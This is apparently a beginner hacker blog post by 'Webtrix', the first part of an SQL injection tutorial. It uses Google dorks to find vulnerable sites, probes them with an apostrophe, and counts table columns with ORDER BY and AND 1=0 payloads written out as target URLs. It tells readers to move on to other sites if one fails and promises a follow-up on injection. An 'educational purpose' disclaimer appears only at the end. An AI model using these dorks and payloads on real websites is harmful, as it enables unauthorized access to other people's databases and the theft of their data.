Hey guyz this is webtrix again to help u with some interesting menu ! ! U know what is SQL injection?? Today we're to talk bout that very fat job ! !
SQL injection is an attack
in which malicious code is put into strings which are later flown to an instance of SQL Server for commiting some works ! !But which sites are SQL vulnerable and how to find them.
Dunworry ! ! !Webtrix is here to assist u. Let's find them out !
How to find sites on which we can perform:
While goin to get a vulnerable site to inject SQL u'll hear the words"Dork a lot"
,this means to google a particular term which targets finding vulnerable websites. An example of a google dork is
inurl:index.php?id=
,entering dis string in google searchengine
would find out all sites from googlecache
with the string news.php?id= in theirURL.Viz:
http://www.site.com/news.php?id=4
To be a SQL injection vulnerable a site has to have a parameter namedGET
in the URL.In http://www.site.com/news.php?id=4 ,
id=4
is theGET
parameteras it is getting the id=4
from theback end database.
How to check Vulnerability with dat:
Whether the site is vulnerable to SQLi or not, to test it we've to justadd an apostrophe( ‘ ) after one of the parameter in the URL.
Viz.http://www.site.com/news.php?id=4'
If the site is vulnerable it will show
error
like:You have an error in your SQL Syntax
Warning:
mysql_num_rows()
Warning: mysql_fetch_assoc()
Warning: mysql_result()
Warning: mysql_fetch_array()
Warning: mysql_numrows()
Warning: mysql_preg_match()
If you notice any of the mentioned errors putting ‘ after the parameter in that URL then therez possibility of the site to be vulnerable a little to SQLi attacks . But itz not the single methode to discover whether the site is vulnerable or not,
vulnurablity can be findout if therez an error in form ofvanishing
while a part of the site is just simply disappears.How to Find number of columns:
When u come to know that the site is vulnerable the further action is to search out the number of columns in the table which is in use. There are lot of ways to find this likeORDER BY
orGROUP BY
.Here use
RDER BY
to search out the number of columns first. Start withORDER BY 1
.Viz.
http://www.site.com/news.php?id=4 ORDER BY 1
-If it doesn’t make the outcome of an error then use
ORDER BY
command. Sometimes you will get error on doingORDER BY 1
, if it gives error then simple move on to other site.If it doesn’t error then always go to
ORDER BY 10000
(because a table can’t have 10000 columns in it) to see if it give error.Viz.
http://www.site.com/news.php?id=4 ORDER BY 10000
–Sometimes it doesn’t error as it should, then use
AND 1=0
before theORDER BY
query to make error outcome.Viz.
http://www.site.com/news.php?id=4 AND 1=0 ORDER BY 10000
–After getting the error on 10000 its up to you how you find the number of columns,
begin with 100 and divide the no of columns by 2 until i get closer.
viz:http://www.site.com/news.php?id=4 ORDER BY 100–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 50–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 25–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 12–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 6–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 3–
NO ERROR
As 6 is giving error and 3 is not the number of columns is either 3, 4 or 5.
http://www.site.com/news.php?id=4 ORDER BY 4–NO ERROR
http://www.site.com/news.php?id=4 ORDER BY 5–
ERROR
After this you can come to decision that the site has 4 columns
as itgives error above ORDER BY 4 and doesn’t error below ORDER BY 4.
[NOTE : Comments are not necessary every time when injecting a site, though sometimes they are. Possible comments to use are:–
/*
/**/
#
Next part on "SQL injection based on URL" will be publish in the nex post. Plz be patnce. :)
[NOTE:This tutorial is only for Educational purpose. Webtrix neither gurantee any trick nor is responsible for the outcomes of any trick performed by any one. Remember SQL injection is a punishable cyber offence.
]¤ Like us on Facebook
www.facebook.com/MyWebtrix
No comments:
Post a Comment